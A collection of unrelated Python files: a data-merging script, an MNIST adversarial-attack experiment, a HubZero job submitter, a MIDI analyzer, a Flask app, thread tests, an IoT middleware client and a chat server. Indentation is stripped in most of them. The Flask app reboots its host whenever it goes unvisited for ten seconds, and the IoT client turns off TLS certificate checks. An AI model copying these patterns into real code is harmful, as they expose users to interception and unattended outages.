f.close()
f = open(with_folder + 'train_before_pairs_sentences' + str(idx), 'r')
train_before_sentences.write(f.read())
f.close()
without_folder = "without_event_words/" + iteration_i + '/'
f = open(without_folder + 'train_before_pairs' + str(idx), 'r')
w_train_before_output.write(f.read())
f.close()
f = open(without_folder +'train_after_pairs' + str(idx), 'r')
w_train_after_output.write(f.read())
f.close()
f = open(without_folder +'train_other_pairs' + str(idx), 'r')
w_train_other_output.write(f.read())
f.close()
f = open(without_folder +'track_train_before_pairs' + str(idx), 'r')
w_track_train_before_output.write(f.read())
f.close()
f = open(without_folder +'track_train_after_pairs' + str(idx), 'r')
w_track_train_after_output.write(f.read())
f.close()
f = open(without_folder +'track_train_other_pairs' + str(idx), 'r')
w_track_train_other_output.write(f.read())
f.close()
f = open(without_folder +'test_other_pairs' + str(idx), 'r')
w_test_other_output.write(f.read())
f.close()
f = open(without_folder +'track_test_other_pairs' + str(idx), 'r')
w_track_test_other_output.write(f.read())
f.close()
train_before_output.close()
train_after_output.close()
train_other_output.close()
track_train_before_output.close()
track_train_after_output.close()
track_train_other_output.close()
test_other_output.close()
track_test_other_output.close()
w_train_before_output.close()
w_train_after_output.close()
w_train_other_output.close()
w_track_train_before_output.close()
w_track_train_after_output.close()
w_track_train_other_output.close()
w_test_other_output.close()
w_track_test_other_output.close()
# remove useless files
for idx in range(0, 10):
with_folder = "with_event_words/" + iteration_i + '/'
os.remove(with_folder + 'train_before_pairs' + str(idx))
os.remove(with_folder + 'train_after_pairs' + str(idx))
os.remove(with_folder + 'train_other_pairs' + str(idx))
os.remove(with_folder + 'track_train_before_pairs' + str(idx))
os.remove(with_folder + 'track_train_after_pairs' + str(idx))
os.remove(with_folder + 'track_train_other_pairs' + str(idx))
os.remove(with_folder + 'test_other_pairs' + str(idx))
os.remove(with_folder + 'track_test_other_pairs' + str(idx))
os.remove(with_folder + 'other_pairs_sentences' + str(idx))
os.remove(with_folder + 'train_after_pairs_sentences' + str(idx))
os.remove(with_folder + 'train_before_pairs_sentences' + str(idx))
without_folder = "without_event_words/" + iteration_i + '/'
os.remove(without_folder + 'train_before_pairs' + str(idx))
os.remove(without_folder +'train_after_pairs' + str(idx))
os.remove(without_folder +'train_other_pairs' + str(idx))
os.remove(without_folder +'track_train_before_pairs' + str(idx))
os.remove(without_folder +'track_train_after_pairs' + str(idx))
os.remove(without_folder +'track_train_other_pairs' + str(idx))
os.remove(without_folder +'test_other_pairs' + str(idx))
os.remove(without_folder +'track_test_other_pairs' + str(idx))
print "over!"
|
main.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Trains a convolutional neural network on the MNIST dataset, then attacks it with the FGSM attack."""
from __future__ import absolute_import, division, print_function, unicode_literals
from keras.models import Sequential
from keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout
import numpy as np
import pickle
from glob import glob
# from art.attacks.evasion import HopSkipJump
from hop_skip_jump import HopSkipJump
from art.estimators.classification import KerasClassifier
from art.utils import load_dataset
import tensorflow as tf
import argparse
from os.path import exists
import multiprocessing
def main(func1, func2, args):
epochs = int(args.epoch) if args.epoch else 5
accuracy_before_attack = 0
path_for_results = './results/'
force_train = True
log_name = f"{path_for_results}{func1}_{func2}_results_log.txt"
classifier_file = "{}_{}_trained_classifier".format(func1, func2)
if not glob(classifier_file) or force_train:
tf.compat.v1.disable_eager_execution()
# Read MNIST dataset
(x_train, y_train), (x_test, y_test), min_, max_ = load_dataset(str("mnist"))
# Create Keras convolutional neural network - basic architecture from Keras examples
# Source here: https://github.com/keras-team/keras/blob/master/examples/mnist_cnn.py
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation=func1, input_shape=x_train.shape[1:]))
model.add(Conv2D(64, (3, 3), activation=func2))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation=func1))
model.add(Dropout(0.5))
model.add(Dense(10, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
classifier = KerasClassifier(model=model, clip_values=(min_, max_), use_logits=False)
        classifier.fit(x_train, y_train, nb_epochs=epochs, batch_size=128)
# Evaluate the classifier on the test set
preds = np.argmax(classifier.predict(x_test), axis=1)
acc = np.sum(preds == np.argmax(y_test, axis=1)) / y_test.shape[0]
print("\nTest accuracy: %.2f%%" % (acc * 100))
accuracy_before_attack = acc * 100
pickle.dump(classifier, open(classifier_file, "wb"))
else:
classifier = pickle.load(open(classifier_file, "rb"))
    # Craft adversarial samples with HopSkipJump
if args.d:
adv_crafter = HopSkipJump(classifier, log_file=log_name, max_eval=1, init_eval=1, max_iter=1)
# single_image = x_test
x_test_adv = adv_crafter.generate(x=x_test)
else:
adv_crafter = HopSkipJump(classifier, log_file=log_name)
x_test_adv = adv_crafter.generate(x=x_test)
# Evaluate the classifier on the adversarial examples
preds = np.argmax(classifier.predict(x_test_adv), axis=1)
acc = np.sum(preds == np.argmax(y_test, axis=1)) / y_test.shape[0]
print("function1: {}, function2: {}".format(func1, func2))
print("\nTest accuracy on adversarial sample: %.2f%% " % (acc * 100))
accuracy_after_attack = acc * 100
with open(log_name, 'a') as log_file:
result_before = "Test accuracy: %.2f%%\n" % accuracy_before_attack
result_after = "Test accuracy on adversarial sample: %.2f%%\n" % accuracy_after_attack
log_file.write(result_before)
log_file.write(result_after)
activation_functions = [
'relu',
'gelu',
'elu',
'selu',
'tanh',
'sigmoid',
]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', action='store_true', help="debug, very short hop_skip run")
parser.add_argument('-all', action='store_true', help="Run all activation function tests in parallel")
parser.add_argument('-epoch', action="store", help = "number of epochs for model. default 5")
args = parser.parse_args()
if not args.all:
main('exponential', 'exponential', args)
else:
for func in activation_functions:
main(func, func, args)
# proc_list = [None] * len(activation_functions)
# for ind, func in enumerate(activation_functions):
# proc_list[ind] = multiprocessing.Process(target=main, args=(func, func, args))
# proc_list[ind].start()
#
# for proc in proc_list:
# proc.join()
# print(f'{proc} is finished')
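        # A hedged alternative to the manual Process bookkeeping sketched above (assumes
        # main() stays importable at module level so multiprocessing can pickle it):
        #
        # from multiprocessing import Pool
        # with Pool(processes=len(activation_functions)) as pool:
        #     pool.starmap(main, [(func, func, args) for func in activation_functions])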
|
submithost.py
|
"""
This file is part of PUQ
Copyright (c) 2013 PUQ Authors
See LICENSE file for terms.
"""
import os, time, sys
from monitor import TextMonitor
from subprocess import Popen, PIPE
import numpy as np
from logging import debug
from hosts import Host
from shutil import rmtree
from stat import S_ISDIR
from glob import glob
from threading import Thread, Event
from util import flushStdStreams
class SubmitHost(Host):
"""
Create a host object that uses the hub submit command.
Args:
cpus: Number of cpus each process uses. Default=1.
cpus_per_node: How many cpus to use on each node. Default=1.
"""
def __init__(self, venue=None, cpus=1, cpus_per_node=1, walltime=60):
Host.__init__(self)
self.cpus = cpus
self.cpus_per_node = cpus_per_node
self.hostname = venue
self.jobs = []
# Creates a CSV file compatible with the HubZero submit command
def add_jobs(self, fname, args):
import shlex
self.fname = fname
first = True
try:
os.mkdir(fname)
except:
pass
f = open(os.path.join(fname,'input.csv'), 'w')
for a in args:
if first:
first = False
print >>f, ', '.join(['@@'+b[0] for b in a])
cmds = [(x[0], '@@'+x[0]) for x in a]
print >>f, ','.join([str(b[1]) for b in a])
f.close()
scmd = "submit --runName=puq -d input.csv %s" % self.prog.cmd(cmds)
self.add_job(shlex.split(scmd), '', 0, '')
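        # Example of the generated input.csv (values below are purely illustrative):
        #   @@x, @@y
        #   1.0,2.0
        #   0.5,3.7
        # submit presumably substitutes each @@-prefixed column into the command built
        # by self.prog.cmd(cmds), one run per row.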
# run, monitor and status return
# True (1) is successful
# False (0) for errors or unfinished
def run(self):
""" Run all the jobs in the queue """
self._running = []
self._monitor = TextMonitor()
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
err = self._run()
os.chdir(cwd)
if err == False:
rmtree(self.fname, ignore_errors=True)
try:
os.remove(self.fname+'.hdf5')
except:
pass
return False
return True
def peg_parse(self):
# parse the contents of the pegasusstatus.txt file
done = 0
filename = 'pegasusstatus.txt'
with open(filename) as f:
for line in f:
if line.startswith('%DONE'):
done = float(line.split()[1])
break
return done
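        # Example of the pegasusstatus.txt line this parser expects (illustrative only):
        #   %DONE 42.5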
def status_monitor(self):
# Watch pegasusstatus.txt for status changes.
# This could possibly be done more efficiently
# using filesystem notification but in practice
# this turned out to be more reliable across
# different OS versions.
found = False
while not found and not self.stop.is_set():
try:
os.chdir('puq/work')
found = True
except:
self.stop.wait(10)
done = -1
while not self.stop.is_set():
try:
d = self.peg_parse()
except:
d = done
if d > done:
print '=RAPPTURE-PROGRESS=>%d Running' % (int(d))
flushStdStreams('stdout')
done = d
if int(d) >= 100:
self.stop.set()
else:
self.stop.wait(10)
def _run(self):
j = self.jobs[0]
print '=RAPPTURE-PROGRESS=>0 Starting'
flushStdStreams('stdout')
try:
myprocess = Popen(j['cmd'], stdout=PIPE, stderr=PIPE, bufsize=0)
except Exception, e:
print 'Command %s failed: %s' % (' '.join(j['cmd']), e)
flushStdStreams('stdout')
self.stop = Event()
p2 = Thread(target=self.status_monitor)
p2.daemon = True
p2.start()
# wait for command to finish
err = True
try:
ret = myprocess.wait()
if ret:
err = False
print 'Submit failed with error %s' % ret
whocares = os.listdir(os.getcwd())
if os.path.exists('puq'):
fn = glob('puq/*.stderr')
if fn:
with open(fn[0]) as f:
print f.read()
flushStdStreams('stdout')
except KeyboardInterrupt:
print '\nPUQ interrupted. Cleaning up. Please wait...\n'
err = False
myprocess.kill()
j['status'] = 'F'
self.stop.set()
if p2 and p2.is_alive():
p2.join()
return err
# Collect the data from individual stdout and stderr files into
# the HDF5 file. Remove files when finished.
def collect(self, hf):
# Collect results from output files
debug("Collecting")
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
hf.require_group('output')
jobs_grp = hf.require_group('output/jobs')
# find the jobs that are completed and, if the stdout/stderr files are there,
# move them to hdf5
finished_jobs = []
os.chdir('puq')
# Get the job stats. Do this in a loop because it looks like
# sometimes this code gets run before pegasus generates the file.
tries = 2
while tries > 0:
try:
data = np.genfromtxt('pegasusjobstats.csv', usecols=(2,3,4,7,15,16), dtype='string',
skip_header=26, comments='#', delimiter=',')
tries = 0
except:
tries -= 1
if tries > 0:
time.sleep(30)
job = {}
for j, _try, site, _time, exitcode, host in data:
if site == 'local':
continue
j = j[j.rfind('_')+1:]
job[j] = (int(_try), site, float(_time), int(exitcode), host)
times = np.empty((len(job)))
for j in job:
jobnum = int(j)-1
times[jobnum] = job[j][2]
if job[j][3] == 0:
finished_jobs.append(jobnum)
if not S_ISDIR(os.stat(j).st_mode):
print "ERROR: job %s directory not found" % j
continue
os.chdir(j)
grp = jobs_grp.require_group(str(jobnum))
for ext in ['out', 'err']:
outfile = glob('*.std%s' % ext)
if outfile:
f = open(outfile[0], 'r')
grp.create_dataset('std%s' % ext, data=f.read())
f.close()
for fn in self.prog.outfiles:
try:
f = open(fn, 'r')
grp.create_dataset(fn, data=f.read())
f.close()
except:
pass
os.chdir('..')
if 'time' in jobs_grp:
del jobs_grp['time']
jobs_grp['time'] = times
os.chdir(cwd)
rmtree(self.fname)
return finished_jobs
|
Midi_Analyzer.py
|
from src import Scale
import time
import threading
import mido
from mido import MidiFile, MidiTrack
# https://mido.readthedocs.io/en/latest/midi_files.html
# http://support.ircam.fr/docs/om/om6-manual/co/MIDI-Concepts.html
tracks = []
def print_ports():
# for potential sound generation...
# nonfunctional
inports = mido.get_input_names()
outports = mido.get_output_names()
for i, p in enumerate(inports):
print('Inport: ' + i + ' ' + p)
for i, p in enumerate(outports):
print('Outport: ' + i + ' ' + p)
def print_notes():
for msg in midi_file:
try:
print(f'Channel: {msg.channel} - {msg.type} - Note: {msg.note}({Scale.get_note_name(msg.note)}{msg.note//12 - 1}) - Vol: {msg.velocity} - Time: {msg.time}')
        except AttributeError:
            pass  # meta messages have no channel/note/velocity fields
def print_messages():
for msg in midi_file:
print(msg)
def print_meta_messages():
for msg in midi_file:
if msg.is_meta:
print(msg)
def play_midi(m):
print(f'Loading {m}...')
for msg in m:
time.sleep(msg.time)
try:
print(f'{msg}')
        except Exception:
            pass  # skip messages that cannot be formatted
def set_tracks():
print(f'Tracks: {len(midi_file.tracks)}')
for track in midi_file.tracks:
print(track.name)
tracks.append(track)
def print_tracks():
for track in tracks:
print(track.name)
for msg in track:
print(f'{track.name} - {msg}')
def print_tracks_info():
print(f'Tracks: {len(tracks)}')
for track in tracks:
print(track.name)
def play_track(track):
for msg in track:
print(msg)
time.sleep(msg.time)
def play_tracks():
    # Play each track on its own thread so they run concurrently; the original passed
    # play_track(track) (already called) as the target and never started the thread.
    for track in tracks:
        thrd = threading.Thread(target=play_track, args=(track,))
        thrd.start()
def get_max_channel():
max = -1
for msg in midi_file:
try:
if msg.channel > max:
max = msg.channel
        except AttributeError:
            pass  # meta messages have no channel attribute
return max
def copy_note(item, n, velocity, length):
item.copy_note(note=n, velocity=velocity, time=length)
def copy_file(file):
mid = MidiFile()
for i, track in enumerate(file.tracks):
mid.tracks.append(MidiTrack())
for msg in track:
if msg.type == 'note_on' or msg.type == 'note_off' or msg.type == 'program_change':
mid.tracks[i].append(msg.copy())
filename = '../generated.mid'
mid.save(filename)
return filename
file_name = '../../Example MIDI Files/Mario_something.mid'
midi_file = MidiFile(file_name)
print_messages()
|
app.py
|
#!/usr/bin/python3
from flask import Flask
from datetime import datetime, timedelta
from threading import Thread
from os import system
from random import randint
last_load = datetime.now()
def grim_reaper():
'''
If site not loaded for 10s reboot host
reboot can be prevented by calling life_line()
'''
s10 = timedelta(seconds=10)
while True:
if (last_load + s10) < datetime.now():
system("reboot")
app = Flask(__name__)
@app.route("/")
def life_line():
'''
Save the site from grim_reaper() for 10s
'''
global last_load
last_load = datetime.now()
return("thank you for saving me for another 10 sec")
if __name__ == "__main__":
t = Thread(target=grim_reaper)
t.start()
app.run(host="0.0.0.0", port=randint(1024,50000), debug=False)
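# Keep-alive sketch for a hypothetical client (host and port are placeholders; the port
# is whatever randint() picked above):
#
#   import requests, time
#   while True:
#       requests.get("http://<host>:<port>/")
#       time.sleep(5)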
|
test_synchronized.py
|
# -*- coding: utf-8 -*-
'''
Copyright 2014, 2015 Yoshida Shin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import threading
import time
import thread_utils
TEST_INTERVAL = 0.1
TEST_COUNT = 5
def test_function_simultaneous_access():
"""
Only one thread can access to decorated function.
"""
@thread_utils.synchronized
def foo(n):
time.sleep(n)
threads = [threading.Thread(target=foo, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_method_simultaneous_access():
"""
Only one thread can access to decorated method.
"""
class Foo(object):
@thread_utils.synchronized
def bar(self, n):
time.sleep(n)
# Call method of the same object.
foo = Foo()
threads = [threading.Thread(target=foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
# same method of various objects.
threads = [threading.Thread(target=Foo().bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_class_method_simultaneous_access():
"""
Only one thread can access to decorated class method.
"""
class Foo(object):
@classmethod
@thread_utils.synchronized
def bar(cls, n):
time.sleep(n)
threads = [threading.Thread(target=Foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_static_method_simultaneous_access():
"""
Only one thread can access to decorated static method.
"""
class Foo(object):
@staticmethod
@thread_utils.synchronized
def bar(n):
time.sleep(n)
threads = [threading.Thread(target=Foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
|
entity.py
|
import contextlib
import requests
import warnings
import json
import asyncio
import aiohttp
from time import time
import threading
requests.packages.urllib3.disable_warnings()
from sys import platform
class Entity(object):
""" The entity object represents any of the IoT entities registered with the RBCCPS IoT Data Exchange & Analytics
Middleware (IDEAM). It can do publish, subscribe, historical data, bind and unbind operations.
    Details of these operations are specified at https://rbccps.org/smartcity.
"""
def __init__(self, entity_id, entity_api_key):
self.entity_id = entity_id
self.owner_api_key = entity_api_key
self.entity_api_key = ""
self.base_url = "https://smartcity.rbccps.org/"
self.subscribe_data = {}
self.event_loop = asyncio.get_event_loop()
def __del__(self):
self.stop_subscribe()
def set_base_url(self, value):
self.base_url = value
return self.base_url
def set_entity_api_key(self, value):
self.entity_api_key = value
return self.entity_api_key
    def get_entity_api_key(self):
        # Renamed from entity_api_key: the instance attribute of the same name set in
        # __init__ shadows a method called entity_api_key, so it could never be called.
        return self.entity_api_key
    def get_subscribe_data(self):
        # Renamed for the same reason as get_entity_api_key.
        return self.subscribe_data
def register(self):
""" Registers a new device with the name entity_id. This device has permissions for services like subscribe,
publish and access historical data.
"""
register_url = self.base_url + "api/0.1.0/register"
register_headers = {
"apikey": str(self.owner_api_key),
"resourceID": str(self.entity_id),
"serviceType": "publish,subscribe,historicData"
}
with self.no_ssl_verification():
r = requests.get(register_url, {}, headers=register_headers)
response = r.content.decode("utf-8")
if "APIKey" in str(r.content.decode("utf-8")):
response = json.loads(response[:-331] + "}") # Temporary fix to a middleware bug, should be removed in future
response["Registration"] = "success"
else:
response = json.loads(response)
response["Registration"] = "failure"
return response
@contextlib.contextmanager
def no_ssl_verification(self):
""" Requests module fails due to lets encrypt ssl encryption. Will be fixed in the future release."""
try:
from functools import partialmethod
except ImportError:
# Python 2 fallback: https://gist.github.com/carymrobbins/8940382
from functools import partial
class partialmethod(partial):
def __get__(self, instance, owner):
if instance is None:
return self
return partial(self.func, instance, *(self.args or ()), **(self.keywords or {}))
old_request = requests.Session.request
requests.Session.request = partialmethod(old_request, verify=False)
warnings.filterwarnings('ignore', 'Unverified HTTPS request')
yield
warnings.resetwarnings()
requests.Session.request = old_request
def publish(self, data):
""" This function allows an entity to publish data to the middleware.
Args:
data (string): contents to be published by this entity.
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
publish_url = self.base_url + "api/0.1.0/publish"
publish_headers = {"apikey": self.entity_api_key}
publish_data = {
"exchange": "amq.topic",
"key": str(self.entity_id),
"body": str(data)
}
with self.no_ssl_verification():
r = requests.post(publish_url, json.dumps(publish_data), headers=publish_headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'publish message ok' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def db(self, entity, query_filters="size=10"):
""" This function allows an entity to access the historic data.
Args:
entity (string): Name of the device to listen to
query_filters (string): Elastic search response format string
example, "pretty=true&size=10"
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
historic_url = self.base_url + "api/0.1.0/historicData?" + query_filters
historic_headers = {
"apikey": self.entity_api_key,
"Content-Type": "application/json"
}
historic_query_data = json.dumps({
"query": {
"match": {
"key": entity
}
}
})
with self.no_ssl_verification():
r = requests.get(historic_url, data=historic_query_data, headers=historic_headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
else:
r = r.content.decode("utf-8")
response = r
return response
def bind(self, devices_to_bind):
""" This function allows an entity to list the devices to subscribe for data. This function must be called
at least once, before doing a subscribe. Subscribe function will listen to devices that are bound here.
Args:
devices_to_bind (list): an array of devices to listen to.
Example bind(["test100","testDemo"])
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
url = self.base_url + "api/0.1.0/subscribe/bind"
headers = {"apikey": self.entity_api_key}
data = {
"exchange": "amq.topic",
"keys": devices_to_bind,
"queue": self.entity_id
}
with self.no_ssl_verification():
r = requests.post(url, json=data, headers=headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'bind queue ok' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def unbind(self, devices_to_unbind):
""" This function allows an entity to unbound devices that are already bound.
Args:
            devices_to_unbind (list): an array of devices that are to be unbound (stop listening)
Example unbind(["test10","testDemo105"])
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
url = self.base_url + "api/0.1.0/subscribe/unbind"
headers = {"apikey": self.entity_api_key}
data = {
"exchange": "amq.topic",
"keys": devices_to_unbind,
"queue": self.entity_id
}
with self.no_ssl_verification():
r = requests.delete(url, json=data, headers=headers)
print(r)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'unbind' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def subscribe(self, devices_to_bind=[]):
""" This function allows an entity to subscribe for data from the devices specified in the bind operation. It
        creates a thread with an event loop to manage the tasks created in start_subscribe_worker.
Args:
devices_to_bind (list): an array of devices to listen to
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
self.bind(devices_to_bind)
loop = asyncio.new_event_loop()
t1 = threading.Thread(target=self.start_subscribe_worker, args=(loop,))
t1.daemon = True
t1.start()
def start_subscribe_worker(self, loop):
""" Switch to new event loop as a thread and run until complete. """
url = self.base_url + "api/0.1.0/subscribe"
task = loop.create_task(self.asynchronously_get_data(url + "?name={0}".format(self.entity_id)))
asyncio.set_event_loop(loop)
loop.run_until_complete(task)
self.event_loop = loop
async def asynchronously_get_data(self, url):
""" Asynchronously get data from Chunked transfer encoding of https://smartcity.rbccps.org/api/0.1.0/subscribe.
        (Only this function requires Python 3; the rest of the functions can be run in Python 2.)
Args:
url (string): url to subscribe
"""
headers = {"apikey": self.entity_api_key}
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
async with session.get(url, headers=headers, timeout=3000) as response:
while True: # loop over for each chunk of data
chunk = await response.content.readchunk()
if not chunk:
break
if platform == "linux" or platform == "linux2": # In linux systems, readchunk() returns a tuple
chunk = chunk[0]
resp = dict()
resp["data"] = chunk.decode()
current_milli_time = lambda: int(round(time() * 1000))
resp["timestamp"] = str(current_milli_time())
self.subscribe_data = resp
except Exception as e:
print("\n********* Oops: " + url + " " + str(type(e)) + str(e) + " *********\n")
print('\n********* Closing TCP: {} *********\n'.format(url))
def stop_subscribe(self):
""" This function is used to stop the event loop created when subscribe is called. But this function doesn't
        stop the thread and should be avoided until it's completely developed.
"""
asyncio.gather(*asyncio.Task.all_tasks()).cancel()
self.event_loop.stop()
self.event_loop.close()
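# Minimal usage sketch (device name and API key below are placeholders, not real credentials):
#
#   entity = Entity("myDevice", "OWNER_API_KEY")
#   resp = entity.register()
#   entity.set_entity_api_key(resp.get("APIKey", ""))
#   entity.publish('{"temperature": 25}')
#   entity.subscribe(devices_to_bind=["otherDevice"])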
|
server.py
|
import socket
import sys
import threading
import selectors
MAXBYTES = 1
MOTD = "Wazzup yoooooo"
namedict = {} #Dict with name as key
sockdict = {} #Dict with socket as key
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
loc = "0.0.0.0"
verbose = False
HELP = "help:\n/help\t\tprints help menu\n/users\t\tprint list of users\n/shutdown\tshut down server"
lock = threading.Lock()
finish = False
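# Wire protocol as inferred from the handlers below (every message is terminated by "\r\n\r\n"):
#   ME2U / U2EM        connection handshake (client -> server, server -> client)
#   IAM <name>         log in; server replies MAI plus "MOTD <motd>", or ETAKEN if the name is in use
#   TO <name> <msg>    relay <msg> to <name> as "FROM <sender> <msg>"; EDNE if <name> is unknown or self
#   LISTU              list users; server replies "UTSIL <name> <name> ..."
#   MORF <name>        server sends "OT <sender>" to <name>
#   BYE                log out; server replies EYB and broadcasts "UOFF <name>"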
def addUser(name,clientsocket):
##MUTEX HERE##
with lock:
if(name in namedict):
print("Taken.")
##CLOSE MUTEX##
return -1
else:
namedict[name] = clientsocket
sockdict[clientsocket] = name
##CLOSE MUTEX##
return 0
def removeUser(clientsocket):
with lock:
##MUTEX HERE##
if clientsocket in sockdict:
name = sockdict[clientsocket]
del sockdict[clientsocket]
del namedict[name]
##CLOSE MUTEX##
return name
else:
##CLOSE MUTEX##
return None
def doLogin(clientsocket, buf):
if(buf == b"ME2U\r\n\r\n"):
clientsocket.send(b"U2EM\r\n\r\n")
else:
print("Junk. Closing")
exit(-1)
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf += clientsocket.recv(MAXBYTES)
if(buf.startswith(b"IAM")):
cmd = buf.split(b" ")
if verbose: print("The name is:",cmd[1].replace(b"\r\n\r\n",b"").decode())
e = addUser(cmd[1].replace(b"\r\n\r\n",b"").decode(),clientsocket)
if(e == -1):
clientsocket.send(b"ETAKEN\r\n\r\n")
else:
if verbose: print("New user!")
clientsocket.send(b"MAI\r\n\r\n")
clientsocket.send(f"MOTD {MOTD}\r\n\r\n".encode())
else:
print("idk what happens in this case -- NON-IAM")
def thread_function(clientsocket,buf):
###REMEMBER: CLIENTSOCKET IS THE SOCKET THIS THREAD READS FROM, IT NEVER CHANGES###
doLogin(clientsocket, buf)
#Listen on info from my clientsocket
while(not finish):
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf+= clientsocket.recv(MAXBYTES)
print("read buf")
print(buf)
## Do Stuff based on what received.
t = buf.split(b" ")
cmd = t[0].replace(b"\r\n\r\n",b"")
print("t")
print(t)
print(cmd)
if cmd == b"TO":
if verbose: print("cmd is TO")
name = t[1].replace(b"\r\n\r\n",b"").decode()
print("name", name)
print(sockdict[clientsocket])
if(name == sockdict[clientsocket]):
if verbose: print("TO to self")
clientsocket.send(f"EDNE {name}\r\n\r\n".encode())
if verbose: print(f"Sent EDNE to {name}")
                continue
elif name in namedict:
t[2:] = [ word.decode() for word in t[2:] ]
msg = " ".join(t[2:])
msg = msg.replace("\r\n\r\n", "")
if verbose: print("msg", msg)
myname = sockdict[clientsocket]
if verbose: print("sending FROM", myname, msg)
sendString = f"FROM {myname} {msg}".encode() #TODO: Something here is going wrong. Might be from client though.
if verbose: print("sendString", sendString)
sendLoc = namedict[name]
sendLoc.send(sendString)
else:
clientsocket.send(f"EDNE {name}\r\n\r\n".encode())
if verbose: print("sent EDNE")
elif cmd == b"LISTU":
if verbose: print("Sending UTSIL")
sendString = b"UTSIL "
for n in namedict:
sendString += f"{n} ".encode()
sendString+=b"\r\n\r\n"
clientsocket.send(sendString)
if verbose: print("Sent UTSIL")
elif cmd == b"MORF":
if verbose: print("is MORF")
name = t[1].replace(b"\r\n\r\n",b"").decode()
myname = sockdict[clientsocket]
sendLoc = namedict[name]
sendLoc.send(f"OT {myname}\r\n\r\n".encode())
if verbose: print(f"sent OT {myname}\r\n\r\n")
elif cmd == b"BYE":
if verbose: print("Goodbye")
name = removeUser(clientsocket)
clientsocket.send(b"EYB\r\n\r\n")
for x in sockdict:
x.send(f"UOFF {name}\r\n\r\n".encode())
#exit(0)
return finish
else:
print("Garbage command. Exiting")
exit(-1)
return finish
def accept():
(clientsocket, address) = serversocket.accept()
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf += clientsocket.recv(MAXBYTES)
if verbose: print("buf loop, read", buf)
## Each individual thread will do this with their client:
threading.Thread(target=thread_function,args=(clientsocket,buf),daemon=True).start()
def readIn():
read_stdin = sys.stdin.readline()
if verbose: print("read from selector", read_stdin)
if read_stdin == "/users\n":
print("users:")
for n in namedict:
print(n)
elif read_stdin == "/help\n":
print(HELP)
elif read_stdin == "/shutdown\n":
shutdown()
def shutdown():
    global finish  # without this, finish = True only created a local and worker threads never saw it
    finish = True
for th in threading.enumerate():
if th != threading.current_thread():
th.join(timeout=1) # wait for child threads to finish
for sock in sockdict:
print("closing", sock)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
print("closing serversocket")
serversocket.shutdown(socket.SHUT_RDWR)
serversocket.close()
print("exiting")
exit()
if __name__ == '__main__':
print(sys.argv)
if(sys.argv[1] == "-h"):
print(HELP)
exit(0)
elif(sys.argv[1] == "-v"):
verbose = True
try:
numWorkers = int(sys.argv[3])
except:
print("numWorkers must be an integer.")
exit(-1)
serversocket.bind((loc,int(sys.argv[2])))
serversocket.listen(numWorkers)
MOTD = sys.argv[4]
else:
try:
numWorkers = int(sys.argv[2])
except:
print("numWorkers must be an integer.")
exit(-1)
serversocket.bind((loc,int(sys.argv[1])))
serversocket.listen(numWorkers)
MOTD = sys.argv[3]
# prepare select to read stdin or socket accept
sel = selectors.DefaultSelector()
